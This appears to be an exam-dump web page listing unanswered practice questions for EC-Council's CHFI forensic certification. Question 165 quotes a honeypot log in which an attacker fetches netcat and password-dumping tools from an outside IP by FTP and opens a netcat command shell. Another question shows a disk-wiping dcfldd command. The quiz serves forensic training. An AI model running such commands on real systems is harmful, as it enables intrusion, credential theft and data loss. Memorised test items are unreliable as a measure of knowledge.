EC1-349 Exam Details

  • Exam Code: EC1-349
  • Exam Name: Computer Hacking Forensic Investigator (CHFI)
  • Certification: EC-COUNCIL Certifications
  • Vendor: EC-COUNCIL
  • Total Questions: 486 Q&As
  • Last Updated: Dec 19, 2024

EC-COUNCIL EC1-349 Online Questions & Answers

  • Question 161:

    Which of the following is not a part of the technical specification of the laboratory-based imaging system?

    A. High performance workstation PC
    B. Remote preview and imaging pod
    C. Anti-repudiation techniques
    D. Very low image capture rate

  • Question 162:

    A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?

    A. Searching for evidence themselves would not have any ill effects
    B. Searching could possibly crash the machine or device
    C. Searching creates cache files, which would hinder the investigation
    D. Searching can change date/time stamps

  • Question 163:

    Wireless access control attacks aim to penetrate a network by evading WLAN access control measures, such as AP MAC filters and Wi-Fi port access controls.

    Which of the following wireless access control attacks allows the attacker to set up a rogue access point outside the corporate perimeter, and then lure the employees of the organization to connect to it?

    A. War driving
    B. Rogue access points
    C. MAC spoofing
    D. Client mis-association

  • Question 164:

    Preparing an image drive to copy files to is the first step in Linux forensics. For this purpose, what would the following command accomplish?

    dcfldd if=/dev/zero of=/dev/hda bs=4096 conv=noerror,sync

    A. Fill the disk with zeros
    B. Low-level format
    C. Fill the disk with 4096 zeros
    D. Copy files from the master disk to the slave disk on the secondary IDE controller

  • Question 165:

    The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

    He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

    "cmd1.exe /c open 213.116.251.162 >ftpcom"

    "cmd1.exe /c echo johna2k >>ftpcom"

    "cmd1.exe /c echo haxedj00 >>ftpcom"

    "cmd1.exe /c echo get nc.exe >>ftpcom"

    "cmd1.exe /c echo get pdump.exe >>ftpcom"

    "cmd1.exe /c echo get samdump.dll >>ftpcom"

    "cmd1.exe /c echo quit >>ftpcom"

    "cmd1.exe /c ftp -s:ftpcom"

    "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

    What can you infer from the exploit given?

    A. It is a local exploit where the attacker logs in using username johna2k
    B. There are two attackers on the system: johna2k and haxedj00
    C. The attack is a remote exploit and the hacker downloads three files
    D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

  • Question 166:

    To calculate the number of bytes on a disk, the formula is: CHS**

    A. number of circles x number of halves x number of sides x 512 bytes per sector
    B. number of cylinders x number of halves x number of shims x 512 bytes per sector
    C. number of cells x number of heads x number of sides x 512 bytes per sector
    D. number of cylinders x number of heads x number of sides x 512 bytes per sector

  • Question 167:

    John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web café purportedly used as a botnet server. John thoroughly scans the computer and finds nothing that would lead him to think the computer was a botnet server. John decides to scan the virtual memory of the computer to possibly find something he had missed. What information will the virtual memory scan produce?

    A. It contains the times and dates of when the system was last patched
    B. It is not necessary to scan the virtual memory of a computer
    C. It contains the times and dates of all the system files
    D. Hidden running processes

  • Question 168:

    What is the target host IP in the following command?

    C:\> firewalk -F 80 10.10.150.1 172.16.28.95 -p UDP

    A. 10.10.150.1
    B. This command is using FIN packets, which cannot scan target hosts
    C. Firewalk does not scan target hosts
    D. 172.16.28.95

  • Question 169:

    While presenting his case to the court, Simon calls many witnesses to the stand to testify. Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a lay witness, what field would she be considered an expert in?

    A. Technical material related to forensics
    B. No particular field
    C. Judging the character of defendants/victims
    D. Legal issues

  • Question 170:

    Raw data acquisition format creates ____________of a data set or suspect drive.

    A. Simple sequential flat files
    B. Segmented files
    C. Compressed image files
    D. Segmented image files

Tips on How to Prepare for the Exams

Nowadays, certification exams are becoming more and more important and are required by more and more enterprises when applying for a job. But how do you prepare for the exam effectively? How do you prepare for the exam in a short time with less effort? How do you get an ideal result, and how do you find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provides not only EC-COUNCIL exam questions, answers and explanations but also complete assistance with your exam preparation and certification application. If you are confused about your EC1-349 exam preparation and EC-COUNCIL certification application, do not hesitate to visit Vcedump.com to find your solutions here.